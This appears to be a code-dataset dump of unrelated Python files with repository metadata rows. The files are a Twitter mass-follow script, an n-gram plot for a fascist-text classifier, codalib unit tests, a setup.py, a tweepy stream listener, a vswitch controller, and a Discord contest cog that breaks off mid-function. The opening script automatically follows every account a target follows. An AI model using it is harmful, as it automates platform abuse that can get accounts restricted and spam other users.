MY_SCREEN_NAME = API.me().screen_name
PROGRESS = detect_progress(TARGET, MY_SCREEN_NAME)
USE_PROGRESS = yes_or_no("Should we use progress from last time? (Choose no if the target has followed anyone since last time or you haven't run this before)")
if not PROGRESS[0] or not USE_PROGRESS: #If we haven't already finished getting friends from the target
    print("Getting List of Friends (Following) of Target...")
    TARGET_FRIEND_IDS = get_list_of_friends(TARGET)
    print("Converting IDs to names...")
    TARGET_FRIEND_NAMES = get_usernames(TARGET_FRIEND_IDS)
    print("Saving to CSV...")
    two_lists_to_csv(TARGET, TARGET_FRIEND_IDS, TARGET_FRIEND_NAMES, PATH_TO_TARGET_CSV)
else:
    print("Restoring Progress on Target...")
    TARGET_FRIEND_IDS, TARGET_FRIEND_NAMES = restore_progress(PATH_TO_TARGET_CSV)
#Save names for later
NAMES_DICT = dict(zip(TARGET_FRIEND_IDS, TARGET_FRIEND_NAMES))
print("Getting List of Your Friends (Following)...")
YOUR_FRIEND_IDS = get_list_of_friends(API.me().id)
print("Converting IDs to names...")
YOUR_FRIEND_NAMES = get_usernames(YOUR_FRIEND_IDS)
print("Saving to CSV...")
two_lists_to_csv(MY_SCREEN_NAME, YOUR_FRIEND_IDS, YOUR_FRIEND_NAMES, PATH_TO_USER_CSV)
print("Subtracting who you've already followed...")
# Use a set for O(1) membership tests instead of scanning the list per id.
ALREADY_FOLLOWED = set(YOUR_FRIEND_IDS)
DIFF_FRIEND_IDS = [f for f in TARGET_FRIEND_IDS if f not in ALREADY_FOLLOWED]
print("Converting ids to names...")
DIFF_FRIEND_NAMES = retrieve_usernames(DIFF_FRIEND_IDS, NAMES_DICT)
print("Saving to CSV...")
# BUG FIX: this used to save to the misspelled path "./output/diffriends.csv",
# so detect_progress() (which checks PATH_TO_DIFF_CSV) could never find it.
two_lists_to_csv(TARGET + " - " + MY_SCREEN_NAME, DIFF_FRIEND_IDS, DIFF_FRIEND_NAMES, PATH_TO_DIFF_CSV)
print("To follow everyone that Target follows, you need to follow:\n\n\n" +
      "\n@".join(DIFF_FRIEND_NAMES))
print("At some point your account may be limited and unable to follow any more people. Probably will go away. ¯\\_(ツ)_/¯")
if yes_or_no("Are you sure you want to (try to) follow %s users?" % len(DIFF_FRIEND_IDS)):
    print("Begin following.")
    for user_id, name in zip(tqdm(DIFF_FRIEND_IDS, unit="Friend"), DIFF_FRIEND_NAMES):
        tqdm.write("Following @" + name + "...")
        API.create_friendship(user_id)
| 37.020305 | 160 | 0.688057 | 0 | 0 | 180 | 0.024668 | 0 | 0 | 0 | 0 | 2,482 | 0.34014 |
d363473272e75d741fdc620437d901b3dcaf7ba6 | 1,962 | py | Python | Code/classification_system/data_visualisation/frequent_ngrams.py | sxd942/fascist_text_classification | 29c429165bdd18ca031a30f98cf86a5090818c3c | [
"DOC"
] | null | null | null | Code/classification_system/data_visualisation/frequent_ngrams.py | sxd942/fascist_text_classification | 29c429165bdd18ca031a30f98cf86a5090818c3c | [
"DOC"
] | null | null | null | Code/classification_system/data_visualisation/frequent_ngrams.py | sxd942/fascist_text_classification | 29c429165bdd18ca031a30f98cf86a5090818c3c | [
"DOC"
] | null | null | null | import pandas as pd
import matplotlib.pyplot as plt
from nltk import ngrams
from preprocessing.preprocess import remove_stopwords
"""
frequent_ngrams.py was used to generate bar plots of most frequently used
bi and trigrams from the fascist and hate documents.
@Author: Siôn Davies
Date: July 2020
"""
# First the fascist documents...
# Load the gold-standard dataset and strip stopwords from every post.
df = pd.read_csv('../Datasets/dataset_utils/Gold_cleaned.csv')
df.Message_Post = df.Message_Post.apply(remove_stopwords)
def converter(Fascist_Speech):
    """Map the 'Yes'/'No' fascist-speech label to a numeric 1/0."""
    return 1 if Fascist_Speech == 'Yes' else 0
# Numeric label: 1 for fascist speech, 0 otherwise.
df['Numeric_Label'] = df['Fascist_Speech'].apply(converter)
# Keep only the fascist-labelled documents.
fascist = df[df.Numeric_Label == 1]
def list_format(data):
    """Split *data* on whitespace and return the tokens as a list."""
    return data.split()
# Flatten all fascist posts into one token list.
# NOTE(review): str() of the list keeps brackets/quotes/commas in the text,
# so some "words" carry punctuation artifacts — confirm this is intended.
words = list_format(''.join(str(fascist.Message_Post.tolist())))
# Top 12 most frequent bigrams and trigrams.
bigrams_series = (pd.Series(ngrams(words, 2)).value_counts())[:12]
trigrams_series = (pd.Series(ngrams(words, 3)).value_counts())[:12]
bigrams_series.sort_values().plot.barh(color='navy', width=0.7, figsize=(7, 3))
plt.ylabel('Bigram')
plt.xlabel('Frequency')
plt.show()
trigrams_series.sort_values().plot.barh(color='navy', width =0.7, figsize=(7, 4))
plt.ylabel('Trigram')
plt.xlabel('Frequency')
plt.show()
# Now to do the same for the hate documents...
df_hate = pd.read_csv('../Datasets/Multiclass/Hate_Fascist_Gold.csv')
df_hate.Message_Post = df_hate.Message_Post.apply(remove_stopwords)
# Label 2 marks hate-speech documents in the multiclass dataset.
hate = df_hate[df_hate.Label == 2]
hate_words = list_format(''.join(str(hate.Message_Post.tolist())))
hate_bigrams_series = (pd.Series(ngrams(hate_words, 2)).value_counts())[:12]
hate_trigrams_series = (pd.Series(ngrams(hate_words, 3)).value_counts())[:12]
hate_bigrams_series.sort_values().plot.barh(color='navy', width=0.7, figsize=(7, 3))
plt.ylabel('Bigram')
plt.xlabel('Frequency')
plt.show()
hate_trigrams_series.sort_values().plot.barh(color='navy', width =0.7, figsize=(7, 4))
plt.ylabel('Trigram')
plt.xlabel('Frequency')
plt.show()
d36373609911bdb8c7a337fdef0874b327dc17a2 | 1,319 | py | Python | tests/util/test_doWaitWebRequest.py | unt-libraries/codalib | d3f2cdf3cc8e9aae14cfab00d1a6de760cc1220b | [
"BSD-3-Clause"
] | null | null | null | tests/util/test_doWaitWebRequest.py | unt-libraries/codalib | d3f2cdf3cc8e9aae14cfab00d1a6de760cc1220b | [
"BSD-3-Clause"
] | 31 | 2015-06-15T22:50:50.000Z | 2021-09-30T14:14:51.000Z | tests/util/test_doWaitWebRequest.py | unt-libraries/codalib | d3f2cdf3cc8e9aae14cfab00d1a6de760cc1220b | [
"BSD-3-Clause"
] | null | null | null | from unittest.mock import Mock
from urllib.error import URLError
from codalib import util
def test_is_sucessful(monkeypatch):
    """
    Verifies the return value from a successful call to
    doWaitWebRequest.
    """
    fake_response = Mock()
    # Stub out doWebRequest so that no real HTTP request is made.
    stub = Mock(return_value=(fake_response, 'fake content'))
    monkeypatch.setattr('codalib.util.doWebRequest', stub)
    result = util.doWaitWebRequest('http://example.com/foo/bar')
    assert result == (fake_response, 'fake content')
def test_retries_request(monkeypatch):
    """
    Check that the request is attempted again if a URLError is raised.
    """
    wait_stub, fake_response = Mock(), Mock()
    # First call fails with URLError, the retry succeeds.
    request_stub = Mock(
        side_effect=[URLError('Fake Error'), (fake_response, 'fake content')]
    )
    # Patch doWebRequest and waitForURL so we do not make an http request.
    monkeypatch.setattr('codalib.util.doWebRequest', request_stub)
    monkeypatch.setattr('codalib.util.waitForURL', wait_stub)
    url = 'http://example.com/foo/bar'
    result = util.doWaitWebRequest(url)
    wait_stub.assert_called_once_with(url)
    assert result == (fake_response, 'fake content')
| 29.977273 | 74 | 0.70508 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 504 | 0.382108 |
d36608a45bbd659af854e64d4a6a6c33241191d1 | 1,609 | py | Python | setup.py | giuse/brutelogger | 1979576b7d78f2e35cdf12b936d912783f7a1d34 | [
"MIT"
] | 1 | 2021-05-14T10:21:35.000Z | 2021-05-14T10:21:35.000Z | setup.py | giuse/brutelogger | 1979576b7d78f2e35cdf12b936d912783f7a1d34 | [
"MIT"
] | null | null | null | setup.py | giuse/brutelogger | 1979576b7d78f2e35cdf12b936d912783f7a1d34 | [
"MIT"
] | null | null | null | # Thanks `https://github.com/pypa/sampleproject`!!
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
# Version and long description live next to setup.py and are read at build time.
with open(path.join(here, 'VERSION'), 'r', encoding='utf-8') as f:
    version = f.read().strip()
with open(path.join(here, 'README.md'), 'r', encoding='utf-8') as f:
    long_description = f.read()
setup(
    name = 'brutelogger',
    version = version,
    description = 'A brutish file logger for when you just need to `tee` your screen.',
    long_description = long_description,
    long_description_content_type='text/markdown',
    url = 'https://github.com/giuse/brutelogger',
    author = 'Giuseppe Cuccu',
    author_email = 'giuseppe.cuccu@gmail.com',
    license = 'MIT',
    classifiers = [
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Build Tools',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3 :: Only',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
    ],
    keywords = 'logging tee',
    packages = find_packages(exclude=['contrib', 'docs', 'tests']), # Required
    python_requires = '>=3.6, <4',
    # Pure stdlib package: no runtime dependencies.
    install_requires = [],
    project_urls={
        'Bug Reports' : 'https://github.com/giuse/brutelogger/issues',
        'Source' : 'https://github.com/giuse/brutelogger/',
    },
    download_url = f"https://github.com/giuse/brutelogger/archive/{version}.tar.gz",
)
| 38.309524 | 91 | 0.625233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 809 | 0.502797 |
d367233e6f58eb094faf45709e0f359789a76a55 | 1,226 | py | Python | stream.py | seweithotroyman/twips | 3c4745706bbf333bf1f54f07c7a6508675f10195 | [
"MIT"
] | null | null | null | stream.py | seweithotroyman/twips | 3c4745706bbf333bf1f54f07c7a6508675f10195 | [
"MIT"
] | null | null | null | stream.py | seweithotroyman/twips | 3c4745706bbf333bf1f54f07c7a6508675f10195 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Jun 26 19:39:00 2019
@author: hehehe
"""
from __future__ import absolute_import, print_function
from tweepy import OAuthHandler, Stream, StreamListener
#Buat API Twitter di link berikut https://developer.twitter.com/en/apps
consumer_key = "masukkan consumer_key"
consumer_secret = "masukkan consumer_secret"
access_token = "masukkan access_token"
access_token_secret = "masukkan access_token_secret"
class TukangBaca(StreamListener):
    """ A listener handles tweets that are received from the stream.
    This is a basic listener that just prints received tweets to stdout.
    """
    def on_data(self, data):
        """Print selected fields of each raw tweet payload.

        Returning True keeps the stream connection open.
        """
        # BUG FIX: `json` was used without ever being imported, so every
        # callback raised NameError. Import it locally here.
        import json
        baca = json.loads(data)
        print("\n\n pada", baca["created_at"])
        print(baca["id_str"])
        print("Tweet: ",baca["text"])
        print("Jumlah Retweet: ",baca["retweet_count"])
        print("Jumlah favorit: ", baca["favorite_count"])
        print(baca["user"])
        return True
if __name__ == '__main__':
    # Listener instance that prints each incoming tweet.
    l = TukangBaca()
    auth = OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    # Prompt (Indonesian: "Enter keyword") — used as the stream filter term.
    query=input("Masukkan Keyword : ")
    stream = Stream(auth, l)
    stream.filter(track=[query])
| 30.65 | 72 | 0.701468 | 522 | 0.425775 | 0 | 0 | 0 | 0 | 0 | 0 | 551 | 0.449429 |
d36e33b56a0770e7874922971f3529c94e845e2e | 683 | py | Python | collatz.py | hansperu/pands-problems-2020-hp | 5394788fad848cae579b7bc8a67369166609c32d | [
"MIT"
] | null | null | null | collatz.py | hansperu/pands-problems-2020-hp | 5394788fad848cae579b7bc8a67369166609c32d | [
"MIT"
] | null | null | null | collatz.py | hansperu/pands-problems-2020-hp | 5394788fad848cae579b7bc8a67369166609c32d | [
"MIT"
] | null | null | null | #ask user to enter a positive value (pedir al usuario que ingrese un valor positivo)
a = int(input("please enter a positive integer: "))
# If the value entered is negative, report "not a positive number" and stop.
while a < 0:
    print (a,"is not a positive number")
    break
# Print the value of (a) when it is a positive integer.
while a > 0:
    print (a)
    break
# Perform the Collatz steps (halve if even, 3n+1 if odd) until reaching 1.
while a > 1:
    if a % 2 == 0:
        a = int(a/2)
    else:
        a = int((a*3)+1)
    print (a)
d36ecdbaec7f5e0f40d109acc1f21404c31625fa | 8,788 | py | Python | core/vswitch_controller_pxp.py | shreyagupta30/vineperf | d5c0a03054f720da2a5ff9eba74feee57fb0296d | [
"ECL-2.0",
"Apache-2.0"
] | 9 | 2017-05-18T03:25:39.000Z | 2021-04-30T18:35:32.000Z | core/vswitch_controller_pxp.py | shreyagupta30/vineperf | d5c0a03054f720da2a5ff9eba74feee57fb0296d | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2020-11-26T09:29:12.000Z | 2021-03-19T22:59:35.000Z | core/vswitch_controller_pxp.py | shreyagupta30/vineperf | d5c0a03054f720da2a5ff9eba74feee57fb0296d | [
"ECL-2.0",
"Apache-2.0"
] | 16 | 2016-12-09T12:47:04.000Z | 2021-05-20T09:28:37.000Z | # Copyright 2016-2018 Intel Corporation., Tieto
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""VSwitch controller for multi VM scenarios with serial or parallel connection
"""
import netaddr
from core.vswitch_controller import IVswitchController
from conf import settings
class VswitchControllerPXP(IVswitchController):
    """VSwitch controller for PXP deployment scenario.

    Configures a single bridge with two physical ports and one or more
    VMs, chained either in series ('pvp', 'pvvp[N]') or in parallel
    ('pvpv[N]').
    """
    def __init__(self, deployment, vswitch_class, traffic):
        """See IVswitchController for general description

        :param deployment: scenario name, e.g. 'pvp', 'pvvp4' or 'pvpv2';
            a trailing number selects the VM count (default 2).
        :param vswitch_class: vswitch implementation class
        :param traffic: dictionary with detailed traffic definition
        """
        super().__init__(deployment, vswitch_class, traffic)
        # 'pvpv*' chains VMs in parallel; every other scenario is serial.
        self._pxp_topology = 'parallel' if deployment.startswith('pvpv') else 'serial'
        if deployment == 'pvp':
            self._pxp_vm_count = 1
        elif deployment.startswith('pvvp') or deployment.startswith('pvpv'):
            if len(deployment) > 4:
                self._pxp_vm_count = int(deployment[4:])
            else:
                self._pxp_vm_count = 2
        else:
            raise RuntimeError('Unknown number of VMs involved in {} deployment.'.format(deployment))
        self._deployment_scenario = deployment
        # Whether the traffic definition requests bidirectional traffic.
        self._bidir = True if self._traffic['bidir'] == 'True' else False
        self._bridge = settings.getValue('VSWITCH_BRIDGE_NAME')
    def setup(self):
        """ Sets up the switch for PXP

        Starts the vswitch, creates the bridge with two physical ports and
        the configured number of vports per VM, then installs connections
        for either the serial or the parallel topology. The vswitch is
        stopped again if any step fails.
        """
        self._logger.debug('Setup using %s', str(self._vswitch_class))
        try:
            self._vswitch.start()
            self._vswitch.add_switch(self._bridge)
            # create physical ports
            (phy1, _) = self._vswitch.add_phy_port(self._bridge)
            (phy2, _) = self._vswitch.add_phy_port(self._bridge)
            # create VM ports
            # initialize vport array to requested number of VMs
            guest_nics = settings.getValue('GUEST_NICS_NR')
            vm_ports = [[] for _ in range(self._pxp_vm_count)]
            # create as many VM ports as requested by configuration, but configure
            # only even number of NICs or just one
            for vmindex in range(self._pxp_vm_count):
                # just for case, enforce even number of NICs or 1
                nics_nr = int(guest_nics[vmindex] / 2) * 2 if guest_nics[vmindex] > 1 else 1
                self._logger.debug('Create %s vports for %s. VM with index %s',
                                   nics_nr, vmindex + 1, vmindex)
                for _ in range(nics_nr):
                    (vport, _) = self._vswitch.add_vport(self._bridge)
                    vm_ports[vmindex].append(vport)
            # configure connections according to the TC definition
            if self._pxp_topology == 'serial':
                # NOTE: all traffic from VMs is sent to other ports directly
                # without applying traffic options to avoid issues with MAC swapping
                # and upper layer mods performed inside guests
                # insert connections for phy ports first
                # from 1st PHY to 1st vport of 1st VM
                self._vswitch.add_connection(self._bridge, phy1, vm_ports[0][0], self._traffic)
                self._vswitch.add_connection(self._bridge, vm_ports[0][0], phy1)
                # from last vport of last VM to 2nd phy
                self._vswitch.add_connection(self._bridge, vm_ports[self._pxp_vm_count-1][-1], phy2)
                self._vswitch.add_connection(self._bridge, phy2, vm_ports[self._pxp_vm_count-1][-1], self._traffic)
                # add serial connections among VMs and VM NICs pairs if needed
                # in case of multiple NICs pairs per VM, the pairs are chained
                # first, before connection to the next VM is created
                for vmindex in range(self._pxp_vm_count):
                    # connect VMs NICs pairs in case of 4 and more NICs per VM
                    connections = [(vm_ports[vmindex][2*(x+1)-1],
                                    vm_ports[vmindex][2*(x+1)])
                                   for x in range(int(len(vm_ports[vmindex])/2)-1)]
                    for connection in connections:
                        self._vswitch.add_connection(self._bridge, connection[0], connection[1])
                        self._vswitch.add_connection(self._bridge, connection[1], connection[0])
                    # connect last NICs to the next VM if there is any
                    if self._pxp_vm_count > vmindex + 1:
                        self._vswitch.add_connection(self._bridge, vm_ports[vmindex][-1], vm_ports[vmindex+1][0])
                        self._vswitch.add_connection(self._bridge, vm_ports[vmindex+1][0], vm_ports[vmindex][-1])
            else:
                # Parallel topology: dispatch traffic among VMs via unique
                # per-NIC-pair streams derived from the base dst MAC/IP/port.
                mac_value = netaddr.EUI(self._traffic['l2']['dstmac']).value
                ip_value = netaddr.IPAddress(self._traffic['l3']['dstip']).value
                port_value = self._traffic['l4']['dstport']
                # initialize stream index; every NIC pair of every VM uses unique stream
                stream = 0
                for vmindex in range(self._pxp_vm_count):
                    # iterate through all VMs NIC pairs...
                    if len(vm_ports[vmindex]) > 1:
                        port_pairs = [(vm_ports[vmindex][2*x],
                                       vm_ports[vmindex][2*x+1]) for x in range(int(len(vm_ports[vmindex])/2))]
                    else:
                        # ...or connect VM with just one NIC to both phy ports
                        port_pairs = [(vm_ports[vmindex][0], vm_ports[vmindex][0])]
                    for port_pair in port_pairs:
                        # override traffic options to ensure, that traffic is
                        # dispatched among VMs connected in parallel
                        options = {'multistream':1,
                                   'stream_type':self._traffic['stream_type'],
                                   'pre_installed_flows':'Yes'}
                        # update connection based on trafficgen settings
                        if self._traffic['stream_type'] == 'L2':
                            tmp_mac = netaddr.EUI(mac_value + stream)
                            tmp_mac.dialect = netaddr.mac_unix_expanded
                            options.update({'l2':{'dstmac':tmp_mac}})
                        elif self._traffic['stream_type'] == 'L3':
                            tmp_ip = netaddr.IPAddress(ip_value + stream)
                            options.update({'l3':{'dstip':tmp_ip}})
                        elif self._traffic['stream_type'] == 'L4':
                            options.update({'l3':{'proto':self._traffic['l3']['proto']}})
                            options.update({'l4':{'dstport':(port_value + stream) % 65536}})
                        else:
                            raise RuntimeError('Unknown stream_type {}'.format(self._traffic['stream_type']))
                        # insert connection to dispatch traffic from physical ports
                        # to VMs based on stream type; all traffic from VMs is
                        # sent to physical ports to avoid issues with MAC swapping
                        # and upper layer mods performed inside guests
                        self._vswitch.add_connection(self._bridge, phy1, port_pair[0], options)
                        self._vswitch.add_connection(self._bridge, port_pair[1], phy2)
                        self._vswitch.add_connection(self._bridge, phy2, port_pair[1], options)
                        self._vswitch.add_connection(self._bridge, port_pair[0], phy1)
                        # every NIC pair needs its own unique traffic stream
                        stream += 1
        except:
            # Best-effort cleanup on any failure: stop the vswitch, re-raise.
            self._vswitch.stop()
            raise
    def stop(self):
        """Tears down the switch created in setup().
        """
        self._logger.debug('Stop using %s', str(self._vswitch_class))
        self._vswitch.stop()
    def get_ports_info(self):
        """See IVswitchController for description
        """
        self._logger.debug('get_ports_info using %s', str(self._vswitch_class))
        return self._vswitch.get_ports(self._bridge)
    def dump_vswitch_connections(self):
        """See IVswitchController for description
        """
        self._vswitch.dump_connections(self._bridge)
| 51.694118 | 115 | 0.575444 | 8,012 | 0.911698 | 0 | 0 | 0 | 0 | 0 | 0 | 2,934 | 0.333864 |
d36f6676ccb48b50304e83341d6e479105d79633 | 14,104 | py | Python | gofest/gofest.py | yamikaitou/rotom | e75cc421e75fcd17921a258e836129b105437191 | [
"MIT"
] | null | null | null | gofest/gofest.py | yamikaitou/rotom | e75cc421e75fcd17921a258e836129b105437191 | [
"MIT"
] | 4 | 2019-01-24T20:13:54.000Z | 2019-05-17T17:47:29.000Z | gofest/gofest.py | yamikaitou/rotom | e75cc421e75fcd17921a258e836129b105437191 | [
"MIT"
] | null | null | null | from redbot.core import commands, Config, checks
import discord
from discord.ext import tasks
import random
import math
from datetime import datetime
class GoFest(commands.Cog):
    def __init__(self, bot):
        """Store the bot reference and start the per-minute contest scheduler."""
        self.bot = bot
        # Kick off the background task loop that opens/closes contest channels.
        self.contest.start()
@commands.is_owner()
@commands.command()
async def gofest(self, ctx):
guild = self.bot.get_guild(331635573271822338)
overwrite = discord.PermissionOverwrite()
overwrite.send_messages = False
overwrite.read_messages = True
chan = await guild.create_text_channel(
"contest-chat",
category=self.bot.get_channel(735618943988793374)
)
await chan.send("Welcome to Go-Fest 2020! It has been a while since we have had a contest so lets have *multiple* for our first ever Play-At-Home Go-Fest. Check out each channel and read the rules for them. They are each different and have very specific entry periods. I will be controlling access to the channels, so they will only be open during the applicable period. Any questions, poke YamiKaitou")
chan = await guild.create_text_channel(
"ar-photos",
category=self.bot.get_channel(735618943988793374)
)
await chan.set_permissions(guild.get_role(335996722775851009), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997012619296770), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997104088416256), overwrite=overwrite)
embed = discord.Embed(title="AR Photo Contest", colour=discord.Colour(0x3b4cca))
embed.set_thumbnail(url="https://lh3.googleusercontent.com/I7GAF9icMRe9lJSiHu-ymM_cR2bTGtU3Hmldc4Qf_yKEmD5JfZ6C6MIkzQBhEmfLu_GPlTAZwRR5SC6NXsIqSw")
embed.add_field(name="Entry Period", value="July 25 10am - July 26 9pm")
embed.add_field(name="Rules", value="* Take an AR or AR+ Snapshot of any Pokemon\n* Post the screenshot in this channel\n* React to your favorite screenshots. Any reaction will count as a vote but you can only vote once per photo.")
embed.add_field(name="Notes", value="* All entries must be submitted by 9pm on Sunday\n* Voting will end at 10pm on Tuesday\n* Multiple entries are allowed, but you can only win once. Please post each entries as a separate message to allow for proper voting\n* Screenshots must be taken with the in-game feature (no collages, no device screenshots, no camera photos, etc)")
embed.add_field(name="Prize", value="1st Place: $15 Gift Card for Apple App Store or Google Play\n2nd Place: $10 Gift Card for Apple App Store or Google Play\n* Winner will be contacted via DM. Code will be delivered as a screenshot of the physical card (sorry, I'm not mailing it to you)\n* Ties will be handled accordingly, I'll figure something out.")
msg = await chan.send(embed=embed)
await msg.pin()
chan = await guild.create_text_channel(
"most-shinies-saturday",
category=self.bot.get_channel(735618943988793374)
)
await chan.set_permissions(guild.get_role(335996722775851009), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997012619296770), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997104088416256), overwrite=overwrite)
embed = discord.Embed(title="Most Shinies (Saturday)", colour=discord.Colour(0x3b4cca))
embed.set_thumbnail(url="https://lh3.googleusercontent.com/I7GAF9icMRe9lJSiHu-ymM_cR2bTGtU3Hmldc4Qf_yKEmD5JfZ6C6MIkzQBhEmfLu_GPlTAZwRR5SC6NXsIqSw")
embed.add_field(name="Entry Period", value="July 25 10am - July 25 9pm")
embed.add_field(name="Rules", value="* Catch Shinies\n* Tell us your final Shiny count at the end of the Go-Fest Day (honor system, I probably won't ask for screenshots)")
embed.add_field(name="Notes", value="* All entries must be submitted by 9pm on Saturday\n* You can only win 1 of the Most Shiny contests")
embed.add_field(name="Prize", value="$10 Gift Card for Apple App Store or Google Play\n* Winner will be contacted via DM. Code will be delivered as a screenshot of the physical card (sorry, I'm not mailing it to you)\n* Ties will be handled accordingly, I'll figure something out.")
msg = await chan.send(embed=embed)
await msg.pin()
chan = await guild.create_text_channel(
"most-shinies-sunday",
category=self.bot.get_channel(735618943988793374)
)
await chan.set_permissions(guild.get_role(335996722775851009), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997012619296770), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997104088416256), overwrite=overwrite)
embed = discord.Embed(title="Most Shinies (Sunday)", colour=discord.Colour(0x3b4cca))
embed.set_thumbnail(url="https://lh3.googleusercontent.com/I7GAF9icMRe9lJSiHu-ymM_cR2bTGtU3Hmldc4Qf_yKEmD5JfZ6C6MIkzQBhEmfLu_GPlTAZwRR5SC6NXsIqSw")
embed.add_field(name="Entry Period", value="July 26 10am - July 26 9pm")
embed.add_field(name="Rules", value="* Catch Shinies\n* Tell us your final Shiny count at the end of Go-Fest Day (honor system, I probably won't ask for screenshots)")
embed.add_field(name="Notes", value="* All entries must be submitted by 9pm on Sunday\n* You can only win 1 of the Most Shiny contests")
embed.add_field(name="Prize", value="$10 Gift Card for Apple App Store or Google Play\n* Winner will be contacted via DM. Code will be delivered as a screenshot of the physical card (sorry, I'm not mailing it to you)\n* Ties will be handled accordingly, I'll figure something out.")
msg = await chan.send(embed=embed)
await msg.pin()
chan = await guild.create_text_channel(
"most-shinies-weekend",
category=self.bot.get_channel(735618943988793374)
)
await chan.set_permissions(guild.get_role(335996722775851009), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997012619296770), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997104088416256), overwrite=overwrite)
embed = discord.Embed(title="Most Shinies (Weekend)", colour=discord.Colour(0x3b4cca))
embed.set_thumbnail(url="https://lh3.googleusercontent.com/I7GAF9icMRe9lJSiHu-ymM_cR2bTGtU3Hmldc4Qf_yKEmD5JfZ6C6MIkzQBhEmfLu_GPlTAZwRR5SC6NXsIqSw")
embed.add_field(name="Entry Period", value="July 25 10am - July 26 10pm")
embed.add_field(name="Rules", value="* Catch Shinies\n* Tell us your final Shiny count at the end of Go-Fest Weekend (honor system, I probably won't ask for screenshots)")
embed.add_field(name="Notes", value="* All entries must be submitted by 10pm on Sunday\n* You can only win 1 of the Most Shiny contests")
embed.add_field(name="Prize", value="$10 Gift Card for Apple App Store or Google Play\n* Winner will be contacted via DM. Code will be delivered as a screenshot of the physical card (sorry, I'm not mailing it to you)\n* Ties will be handled accordingly, I'll figure something out.")
msg = await chan.send(embed=embed)
await msg.pin()
chan = await guild.create_text_channel(
"highest-iv-rotom",
category=self.bot.get_channel(735618943988793374)
)
await chan.set_permissions(guild.get_role(335996722775851009), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997012619296770), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997104088416256), overwrite=overwrite)
embed = discord.Embed(title="Highest IV of Rotom (Wash Form)", colour=discord.Colour(0x3b4cca))
embed.set_thumbnail(url="https://lh3.googleusercontent.com/I7GAF9icMRe9lJSiHu-ymM_cR2bTGtU3Hmldc4Qf_yKEmD5JfZ6C6MIkzQBhEmfLu_GPlTAZwRR5SC6NXsIqSw")
embed.add_field(name="Entry Period", value="July 25 10am - July 26 10pm")
embed.add_field(name="Rules", value="* Take snapshots to get Photobombed by Rotom during GoFest\n* Post your IV Appraisal for Rotom")
embed.add_field(name="Notes", value="* All entries must be submitted by 10pm on Sunday\n* You can get 5 encounters per day")
embed.add_field(name="Prize", value="$15 Gift Card for Apple App Store or Google Play\n* Winner will be contacted via DM. Code will be delivered as a screenshot of the physical card (sorry, I'm not mailing it to you)\n* Ties will be handled accordingly, I'll figure something out (most likely by weight, so make sure you screenshot it unevolved and include the weight).")
msg = await chan.send(embed=embed)
await msg.pin()
chan = await guild.create_text_channel(
"highest-iv-victini",
category=self.bot.get_channel(735618943988793374)
)
await chan.set_permissions(guild.get_role(335996722775851009), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997012619296770), overwrite=overwrite)
await chan.set_permissions(guild.get_role(335997104088416256), overwrite=overwrite)
embed = discord.Embed(title="Highest IV Victini", colour=discord.Colour(0x3b4cca))
embed.set_thumbnail(url="https://lh3.googleusercontent.com/I7GAF9icMRe9lJSiHu-ymM_cR2bTGtU3Hmldc4Qf_yKEmD5JfZ6C6MIkzQBhEmfLu_GPlTAZwRR5SC6NXsIqSw")
embed.add_field(name="Entry Period", value="July 25 10am - July 30 10pm")
embed.add_field(name="Rules", value="* Complete the Special Research given on Day 2\n* Post your IV Appraisal for Victini")
embed.add_field(name="Notes", value="* All entries must be submitted by 10pm on Thursday\n* These rules may be modified based on the contents of the Special Research, Rotom will announce the Special Pokemon for this contest before the start of the Entry Period")
embed.add_field(name="Prize", value="$15 Gift Card for Apple App Store or Google Play\n* Winner will be contacted via DM. Code will be delivered as a screenshot of the physical card (sorry, I'm not mailing it to you)\n* Ties will be handled accordingly, I'll figure something out (most likely by weight, so make sure you screenshot it unevolved and include the weight).")
msg = await chan.send(embed=embed)
await msg.pin()
@tasks.loop(minutes=1.0)
async def contest(self):
dt = datetime.now()
guild = self.bot.get_guild(331635573271822338)
permstart = discord.PermissionOverwrite()
permstart.read_messages = True
permstart.send_messages = True
permstart.add_reactions = True
permend = discord.PermissionOverwrite()
permend.read_messages = True
permend.send_messages = False
permend.add_reactions = True
permvote = discord.PermissionOverwrite()
permvote.read_messages = True
permvote.send_messages = False
permvote.add_reactions = False
roles = [335996722775851009, 335997012619296770, 335997104088416256]
# Start 7/25 10am
if 1595689800 <= int(math.floor(dt.timestamp())) < 1595689860:
for role in roles:
await self.bot.get_channel(735863543634722877).set_permissions(guild.get_role(role), overwrite=permstart)
await self.bot.get_channel(735863548596584478).set_permissions(guild.get_role(role), overwrite=permstart)
await self.bot.get_channel(735863556745986068).set_permissions(guild.get_role(role), overwrite=permstart)
await self.bot.get_channel(735863560726380658).set_permissions(guild.get_role(role), overwrite=permstart)
await self.bot.get_channel(735863565826916418).set_permissions(guild.get_role(role), overwrite=permstart)
print("Start 7/25 10am")
# End 7/25 9pm
elif 1595728800 <= int(math.floor(dt.timestamp())) < 1595728860:
for role in roles:
